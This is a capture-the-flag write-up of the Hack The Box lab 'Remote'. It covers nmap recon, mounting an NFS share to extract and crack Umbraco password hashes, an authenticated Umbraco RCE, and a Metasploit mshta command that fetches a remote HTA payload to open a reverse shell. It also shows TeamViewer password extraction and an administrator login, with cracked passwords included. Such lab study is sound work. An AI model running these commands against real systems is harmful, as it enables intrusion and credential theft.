Post

Hack The Box Write-Up Remote – 10.10.10.180

It doesn’t matter how many times you get knocked down. All that matters is you get up one more time than you were knocked down.

Roy T. Bennett

About Remote

In this post, I’m writing a write-up for the machine Remote from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills

Remote is a ‘Easy’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 10 and submitting the root flag you points will be raised by 20.

Foothold

After the portscan, I found that this box is hosting a website, which is reachable on port 80/tcp. To login on the backend, there are some credentials needed. These credentials can be found in the Umbraco.sdf database hosted on an NFS share. After login on to the backend of the website, I notice that this website uses the Umbraco CMS.

User

The website is using Umbraco version 7.12.4 which contains an (Authenticated) Remote Command Execution Vulnerability. Through this RCE I was able to get the user flag by using the exploit modified by noraj.

Root

After basic enumeration, I found the remote service which can be exploited due to a vulnerability in Teamviewer Desktop version 7. Normally, I root a box manually. Because I think it would be nice to rooting a box with Metasploit once in a while, I have used Metasploit to root this machine.

Machine Info

hackthebox-remote-machine-info

hackthebox-remote-machine-ip-and-creator

Recon

Port scan with Nmap

As always I start with a portscan with Nmap.

1
nmap -sC -sV -oA ./nmap/remote.txt 10.10.10.180

The results.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-21 16:53 EDT
Nmap scan report for 10.10.10.180
Host is up (0.079s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  mountd        1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m13s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-03-21T20:56:23
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.87 seconds

There are several open ports.

  1. 21/TCP (FTP), anonymous ftp login allowed 🙂
  2. 80/tcp (HTTP)
  3. 111/tcp (SunRPC)
  4. 135/tcp (Microsoft Windows RPC)
  5. 139/tcp (NetBIOS)
  6. 445/tcp (SMB)
  7. 2049/tcp (Network File System (NFS)

Enumeration FTP

The File Transfer Protocol (FTP) is a protocol that can be used to transfer data between a client and a server on a network.

Nmap has found the FTP port with anonymous login allowed. I created an FTP session to this box through port 21. I logged in with username anonymous and as password anonymous.

1
2
3
4
5
6
7
8
9
10
11
12
13
~$ ftp 10.10.10.180
Connected to 10.10.10.180.
220 Microsoft FTP Service
Name (10.10.10.180:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp>

I tried to get the contents and it seems that there are no files listed. Tried some other commando’s but no useful information comes back.

Enumeration Web Server

The Nmap scan found that the HTTP port is open. I checked the web service and there is a website hosted on this box. Acme Widgets is the name of this website.

http://10.10.10.180

On the Contact page, there is a button that redirects me to a login page. According to the source code, this website is using the open-source CMS Umbraco. I have tried the default username admin and the default password Admin1234!, but no luck. I need to find the credentials. Umbraco is usually using the Umbraco.sdf database file for storing credentials.

Let’s check the NFS, maybe I have access to this database file.

Enumeration NFS (Network File System)

The next step is to do some enumeration on the NFS port 2049. It seems that there is an NFS share.

1
2
3
kali@kali:/home/htb/boxes/remote$ showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)

Now, I can mount that share and walk through the files. In my working directory, I create a directory called tb_mount.

1
2
3
~$ mount -t nfs 10.10.10.180:/site_backups /home/htb/boxes/machines/remote/tb_mount/
~$ ls
App_Browsers  App_Data  App_Plugins  aspnet_client  bin  Config  css  default.aspx  Global.asax  Media  scripts  Umbraco  Umbraco_Client  Views  Web.config

It seems that I have access to the source files of the website. After a quick searching around I have found the Umbraco.sdf database file.

1
2
3
~$ cd App_Data
/App_Data$ ls
cache  Logs  Models  packages  TEMP  umbraco.config  Umbraco.sdf

With cat I can check the contents of this file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
/App_Data$ cat Umbraco.sdf
VttyAdministratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d׃[email protected]
calb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50BiIfhVgvrfhVgXvadminadmin@htb.loca
lb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}[email protected][{"alias":"umbIntroIntroduction","co
mpleted":false,"disabled":true}][email protected]==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"
}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e?gAg.ogOgYwssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUA
dpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}[email protected]~
g)
g.og7
[email protected]+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}[email protected]
-4ab0-93f7-5ee9724c8d32#0 A$C=HDY^`FnyPHI KPM
@`CprGPLUHUH4-`II AEEqDD|       5!
Eq
Q
|p!p`@8~!PI@
|p!p~!PIEEqDD|  5!
Eq
Q
|p!p~!HH|
....

On the top in this file, there are some usernames listed and hashed passwords. The first hash is a SHA1 hash. I placed this hash in the file password.txt.

1
b8be16afba8c314ad33d812f22a04991b90e2aaa

Ok, it is now time for john.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
~$ john password.txt --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-Linkedin"
Use the "--format=Raw-SHA1-Linkedin" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "ripemd-160"
Use the "--format=ripemd-160" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "has-160"
Use the "--format=has-160" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 128/128 SSE2 4x])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
baconandcheese   (?)
1g 0:00:00:01 DONE (2020-03-28 15:29) 0.6493g/s 6379Kp/s 6379Kc/s 6379KC/s baconandchipies1..baconandcabbage
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed

John has cracked the hash and found the password baconandcheese. Let’s try if we can login through the portal.

Username: [email protected]
Password: baconandcheese

I’m able to log in on the backend of this website. I’m now landed on the CMS system. On the bottom, there is a help question mark visible. Now the version of Umbraco is visible.

hackthebox-remote-umbraco

Exploitation

Remote Code Execution (RCE)

Let’s use searchsploit and check if there is a known vulnerability for this version of Umbraco.

1
2
3
4
5
6
7
8
9
10
~$ searchsploit Umbraco
-------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                      |  Path
                                                                                                                    | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Umbraco CMS - Remote Command Execution (Metasploit)                                                                 | exploits/windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution                                                          | exploits/aspx/webapps/46153.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting                                                          | exploits/php/webapps/44988.txt
-------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

There is an (Authenticated) Remote Code Execution for this version of Umbraco. As I have already access to the portal, I’m authenticated against this service. I can use the exploit 46153.py, although I can also use the modified exploit, created by noraj. However, I have used both exploits; with the first exploit I was able to create a reverse shell and with the exploit from noraj there is no reverse shell needed. I used the last exploit for this write-up.

Getting user access

I downloaded the exploit from Github.

1
2
3
4
5
6
7
~$ sudo git clone https://github.com/noraj/Umbraco-RCE
Cloning into 'Umbraco-RCE'...
remote: Enumerating objects: 25, done.
remote: Counting objects: 100% (25/25), done.
remote: Compressing objects: 100% (25/25), done.
remote: Total 25 (delta 8), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (25/25), 7.98 KiB | 371.00 KiB/s, done.

I launched this exploit by using this command below.

1
2
3
4
5
6
7
~$ python3 exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'hostname; pwd; whoami'
remote

iis apppool\defaultapppool
Path                       
----                       
C:\windows\system32\inetsrv

The exploit worked and it seems that I have permissions as the user iis apppool\defaultapppool. After a little searching and poking around I found out that the user flag was in the C:\Users\Public directory.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
~$ python3 exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'cd $env:public; ls'


    Directory: C:\Users\Public


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-r---        2/19/2020   3:03 PM                Documents                                                             
d-r---        9/15/2018   3:19 AM                Downloads                                                             
d-r---        9/15/2018   3:19 AM                Music                                                                 
d-r---        9/15/2018   3:19 AM                Pictures                                                              
d-r---        9/15/2018   3:19 AM                Videos                                                                
-ar---         4/2/2020   2:26 PM             34 user.txt    

With this command below I can catch the user flag.

1
2
~$ python3 exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'cd $env:public; cat user.txt'
e93cb767cba5bb6c03b1bb4fa3971019

Privilege Escalation

Enumeration

Now I have user privileges on this box, I need to enumerate further how I can escalate my privileges. First, I checked the running processes and it turns out that there is a TeamViewer_Service running. As the name of this box is Remote, coincidence does not exist, the name of this box is a hint towards this service.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
~$ python3 exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'Get-Process'
...
    115       7     1268       5400              5096   0 svchost
    360      26     8504      17696              5524   0 svchost
    229      15     4124      13552              5760   0 svchost
    120       7     1360       5844              5920   0 svchost
    160       9     2700       7296              6128   0 svchost
   1581       0      192        148                 4   0 System
   1098      23     4976      18724              3068   0 TeamViewer_Service
    178      12     3232      10312              3040   0 VGAuthService
    122       8     1572       6404              1392   0 vmacthlp
    298      21     5504      18336              2408   0 vmtoolsd
   1560     125   283540     284652      22.00   1752   0 w3wp
    175      11     1532       6884               480   0 wininit
    254      12     2748      14288               548   1 winlogon
    168      11     1564       7556              4984   0 WmiApSrv
    368      16     8544      17852              4664   0 WmiPrvSE
    569      26    15068      24616              5380   0 WmiPrvSE

Its important to know which version of Teamviewer is installed.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
~$ python3 exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'Get-Service'                                                                 
                                                                                                                                                                                                                                           
Status   Name               DisplayName                                                                                                                                                                                                    
------   ----               -----------                                                                                                                                                                                                    
...
Running  SystemEventsBroker System Events Broker
Stopped  TabletInputService Touch Keyboard and Handwriting Pane...
Stopped  tapisrv            Telephony
Running  TeamViewer7        TeamViewer 7
Stopped  TermService        Remote Desktop Services
Running  Themes             Themes
Stopped  TieringEngineSe... Storage Tiers Management
Running  TimeBrokerSvc      Time Broker
...

Teamviewer 7 is installed on this box. This is a very outdated version of Teamviewer. There should be definitely a way to exploit this service to perform a privilege escalation.

Exploitation

CVE-2019-18988

After a little search on the internet, I found this article https://whynotsecurity.com/blog/teamviewer/. This article describes the vulnerability CVE-2019-18988. This vulnerability works from Teamviewer Desktop version v7.0.43148 through version 14.7.1965. It allows a bypass of remote-login access control because the same key is used for different customers’ installations. With versions before v9.x , this allowed for attackers to decrypt the Unattended Access password to the system (which allows for remote login to the system as well as headless file browsing).

Normally, I do the exploit in the manual. But, this privilege escalation I will do by the use of Metasploit. Why? Because I think it would be nice to rooting a box with Metasploit once in a while. For this privilege escalation, I’m using the ‘post/windows/gather/credentials/teamviewer_passwords’ module from Metasploit.

1
2
3
4
5
6
7
8
msf5 > search teamviewer

Matching Modules
================

   #  Name                                                  Disclosure Date  Rank    Check  Description
   -  ----                                                  ---------------  ----    -----  -----------
   0  post/windows/gather/credentials/teamviewer_passwords                   normal  No     Windows Gather TeamViewer Passwords

First, I need to create a reverse shell, before I can use this module. I decided to create a reverse shell with mshta.exe. This program runs the Microsoft HTML Application Host and is responsible for running HTML application files. This program is not considered harmful to your system, but you can use this by creating a reverse shell. Also Metasploit has a module for it.

1
2
3
4
5
6
7
8
9
10
11
12
13
msf5 > use exploit/windows/misc/hta_server
msf5 exploit(windows/misc/hta_server) > set srvhost 10.10.14.31
srvhost => 10.10.14.31
msf5 exploit(windows/misc/hta_server) > set lhost 10.10.14.31
lhost => 10.10.14.31
msf5 exploit(windows/misc/hta_server) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] Using URL: http://10.10.14.31:8080/70UN29zyQv.hta
[*] Server started.
msf5 exploit(windows/misc/hta_server) >

I need to deliver this payload to this box.

1
~$ python3 exploit.py -u [email protected] -p "baconandcheese" -i http://10.10.10.180 -c powershell.exe -a 'mshta.exe http://10.10.14.31:8080/6JZCCUIx.hta'

The payload got delivered and I have now a reverse shell.The default behavior of Metasploit is that the shell is opening on the background. I need to interact with this session to exploit Teamviewer.

1
2
3
4
5
6
7
8
9
10
11
12
13
[*] Sending stage (180291 bytes) to 10.10.10.180                                                                                                                                                                                           
[*] Meterpreter session 1 opened (10.10.14.31:4444 -> 10.10.10.180:49704) at 2020-04-02 15:32:11 -0400
msf5 exploit(windows/misc/hta_server) > sessions -i                                                                                                                                                                                        
                                                                                                                                                                                                                                           
Active sessions                                                                                                                                                                                                                            
===============                                                                                                                                                                                                                            
                                                                                                                                                                                                                                           
  Id  Name  Type                     Information                          Connection                                                                                                                                                       
  --  ----  ----                     -----------                          ----------                                                                                                                                                       
  1         meterpreter x86/windows  IIS APPPOOL\DefaultAppPool @ REMOTE  10.10.14.31:4444 -> 10.10.10.180:49704 (10.10.10.180)                                                                                                            
                                                                                                                                                                                                                                           
msf5 exploit(windows/misc/hta_server) > sessions -i 1                                                                                                                                                                                      
[*] Starting interaction with 1... 

I’m now interacting with my reverse shell and the module to exploit Teamviewer can now be called from the meterpreter.

1
2
3
4
5
meterpreter > run post/windows/gather/credentials/teamviewer_passwords

[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!
[+] Passwords stored in: /home/kali/.msf4/loot/20200402153617_default_10.10.10.180_host.teamviewer__104747.txt

Own Remote

I got now the password. Now I can try to establish a remote session with Evil-WinRM.

1
2
3
4
5
6
7
8
9
10
~$ evil-winrm -u administrator -p '!R3m0te!' -i 10.10.10.180

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
remote\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
627c5d7c4a820ff0f9681531ace088ea

The box is now rooted. I have really enjoyed writing this post. Please drop me a respect, if you enyojed reading this write-up, I really appreciate. My profile: https://app.hackthebox.com/profile/224856.com/profile/224856.

Happy Hacking!

This post is licensed under CC BY 4.0 by the author.